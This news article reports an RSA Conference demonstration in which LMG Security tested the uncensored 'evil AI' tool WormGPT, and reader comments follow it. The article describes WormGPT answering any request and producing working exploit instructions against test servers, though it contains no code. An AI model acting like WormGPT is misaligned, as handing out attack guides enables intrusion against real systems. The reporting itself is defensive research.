At RSA Conference, experts reveal how "evil AI" is changing hacking forever

Skye Jacobs

Posts: 583   +13
Staff
A hot potato: A new wave of AI tools designed without ethical safeguards is empowering hackers to identify and exploit software vulnerabilities faster than ever before. As these "evil AI" platforms evolve rapidly, cybersecurity experts warn that traditional defenses will struggle to keep pace.

On a recent morning at the annual RSA Conference in San Francisco, a packed room at Moscone Center had gathered for what was billed as a technical exploration of artificial intelligence's role in modern hacking.

The session, led by Sherri Davidoff and Matt Durrin of LMG Security, promised more than just theory; it would offer a rare, live demonstration of so-called "evil AI" in action, a topic that has rapidly moved from cyberpunk fiction to real-world concern.

Davidoff, LMG Security's founder and CEO, set the stage with a sober reminder of the ever-present threat from software vulnerabilities. But it was Durrin, the firm's Director of Training and Research, who quickly shifted the tone, reports Alaina Yee, senior editor at PCWorld.

He introduced the concept of "evil AI" – artificial intelligence tools designed without ethical guardrails, capable of identifying and exploiting software flaws before defenders can react.

"What if hackers utilize their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?" Durrin asked the audience, previewing the unsettling demonstrations to come.

The team's journey to acquire one of these rogue AIs, such as GhostGPT and DevilGPT, usually ended in frustration or discomfort. Finally, their persistence paid off when they tracked down WormGPT – a tool highlighted in a post by Brian Krebs – through Telegram channels for $50.

As Durrin explained, WormGPT is essentially ChatGPT stripped of its ethical constraints. It will answer any question, no matter how destructive or illegal the request. However, the presenters emphasized that the true threat lies not in the tool's existence but in its capabilities.

The LMG Security team began by testing an older version of WormGPT on DotProject, an open-source project management platform. The AI correctly identified a SQL vulnerability and proposed a basic exploit, though it failed to produce a working attack – likely because it couldn't process the entire codebase.

A newer version of WormGPT was then tasked with analyzing the infamous Log4j vulnerability. This time, the AI not only found the flaw but provided enough information that, as Davidoff observed, "an intermediate hacker" could use it to craft an exploit.

The real shock came with the latest iteration: WormGPT offered step-by-step instructions, complete with code tailored to the test server, and those instructions worked flawlessly.

To push the limits further, the team simulated a vulnerable Magento e-commerce platform. WormGPT detected a complex two-part exploit that evaded detection by mainstream security tools like SonarQube and even ChatGPT itself. During the live demonstration, the rogue AI offered a comprehensive hacking guide, unprompted and with alarming speed.

As the session drew to a close, Davidoff reflected on the rapid evolution of these malicious AI tools.

"I'm a little nervous about where we will [be] with hacker tools in six months because you can clearly see the progress that has been made over the past year," she said. The audience's uneasy silence echoed the sentiment, Yee wrote.

Image credit: PCWorld, LMG Security

Permalink to story:

 
Is anyone surprised?

With OpenAi, Apple, Microsoft, Google, and Amazon doing all sorts of illegal actions in training their own A.I models by any means necessary, it's only natural for hackers to do the same.

At least hackers are not the wolves dressed in sheep's clothing....
 
Last edited:
"What if hackers utilize their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?"
Surely someone will develop an AI based penetration/vulnerability testing tool which software developers can utilise to determine whether their applications have known vulnerabilities before they release them to market. As new vulnerabilities are discovered the test tool gets updated.

I really don't see this as any different to the current virus/malware applications in use today, but with a focus on bug/vulnerability testing and AI driving the checks/tests.
 
AI is just a tool, it can't be evil lol

Otherwise, this is just the next logical step for the digital security arms race....
 
I think sonarqube has rolled out ai assisted code quality and penetration testing suite to perform simulated tests but yes owasp and other open source tools need to implement the same leverage AI against AI
 
Humans are social creatures, and we're all instances of the same DNA. We're not inherently evil, but some may misbehave due to harsh environments they need to navigate to survive. In some cases, this can make them a problem for society. However, democracy at it’s core is a peer-to-peer architecture, not a client-server system (it’s build around citizens not around a central authority). The more power you give to a central "server" to handle problems, the more power you, as a citizen, lose. As Margaret Thatcher once said, "Before you enter a room, you must know how you will exit." So, before you give power to a central authority to keep you secure, you must know how you will take it back. If you're unsure, stick with the peer-to-peer architecture for the long-term safety of your freedom. Because always more “security” means less freedom and because of that social fear is toxic for democracy.
OGCN5QM.jpeg
 
I have no fear of this impacting my home network. Professionally, there's always insurance for these things.
 
Back